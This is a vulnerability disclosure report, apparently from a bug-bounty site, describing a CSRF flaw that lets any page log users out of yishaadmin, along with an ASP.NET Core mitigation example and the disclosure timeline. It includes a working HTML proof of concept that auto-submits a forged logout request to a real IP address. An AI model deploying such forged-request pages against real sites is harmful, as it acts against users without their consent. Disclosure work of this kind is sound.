Cross-Site Request Forgery (CSRF) in liukuo362573/yishaadmin

Valid

Reported on

Jan 7th 2022


Description

An attacker can log out a user of the application by getting that logged-in user to visit a page the attacker controls, because the logout endpoint accepts a plain GET request with no CSRF protection.

Proof of Concept

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://106.14.124.170/admin/Home/LoginOff">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Impact

This vulnerability allows an attacker to force users to log out unintentionally.

More details

One way a GET logout endpoint can be abused: someone (a competitor, perhaps) places an image tag with src="<your logout link>" anywhere on the internet, and if a user of your site stumbles upon that page, they are logged out without knowing it. This is why logout should be a POST request that carries a CSRF token.
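The mitigation described above, shown as an added example for an ASP.NET Core MVC controller; this is not yishaadmin's own code or its actual fix, and the controller and action names, the Login redirect target and the Startup wiring are assumptions made for illustration:

```csharp
// Added example (not yishaadmin's code): logout hardened against CSRF in ASP.NET Core MVC.
// HomeController/LoginOff/LoginOffVulnerable and the "Login" redirect target are assumed names.
using Microsoft.AspNetCore.Authentication;
using Microsoft.AspNetCore.Authentication.Cookies;
using Microsoft.AspNetCore.Http;
using Microsoft.AspNetCore.Mvc;
using Microsoft.Extensions.DependencyInjection;
using System.Threading.Tasks;

public class HomeController : Controller
{
    // Before: reachable with a plain GET, so an <img src="..."> or an auto-submitted
    // form on any third-party page logs the visitor out (the issue in this report).
    [HttpGet]
    public async Task<IActionResult> LoginOffVulnerable()
    {
        await HttpContext.SignOutAsync();
        return RedirectToAction("Login");
    }

    // After: only POST is accepted, and the request must carry the anti-forgery token
    // that the framework binds to the caller's cookie. A cross-origin page cannot read
    // that token, so a forged request is rejected with HTTP 400 before SignOutAsync runs.
    [HttpPost]
    [ValidateAntiForgeryToken]
    public async Task<IActionResult> LoginOff()
    {
        await HttpContext.SignOutAsync();
        return RedirectToAction("Login");
    }
}

public class Startup
{
    public void ConfigureServices(IServiceCollection services)
    {
        // Defence in depth: a Lax SameSite auth cookie is not sent on cross-site POSTs
        // (and not on cross-site image loads), so the forged request arrives unauthenticated.
        services.AddAuthentication(CookieAuthenticationDefaults.AuthenticationScheme)
            .AddCookie(options => options.Cookie.SameSite = SameSiteMode.Lax);

        // Require the token on every unsafe method (POST/PUT/PATCH/DELETE) globally,
        // so a state-changing action that forgets [ValidateAntiForgeryToken] is still covered.
        services.AddControllersWithViews(options =>
            options.Filters.Add(new AutoValidateAntiforgeryTokenAttribute()));
    }
}
```

In the Razor view, the legitimate logout control becomes `<form asp-action="LoginOff" method="post">` with a submit button; the form tag helper emits the hidden `__RequestVerificationToken` field automatically, so only forms rendered by the site itself can reach the action. Any remaining links or menu entries that point at the old GET URL must be changed to submit that form, otherwise they break once the GET route is removed.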

Note

While this cannot harm a user's account, it can be a great annoyance and is a valid CSRF.

We are processing your report and will contact the liukuo362573/yishaadmin team within 24 hours. 21 days ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md 20 days ago
We have contacted a member of the liukuo362573/yishaadmin team and are waiting to hear back 19 days ago
liukuo362573 validated this vulnerability 19 days ago
KhanhCM has been awarded the disclosure bounty
The fix bounty is now up for grabs
liukuo362573 confirmed that a fix has been merged on 4ef52f 17 days ago
The fix bounty has been dropped
HomeController.cs#L71-L101 has been validated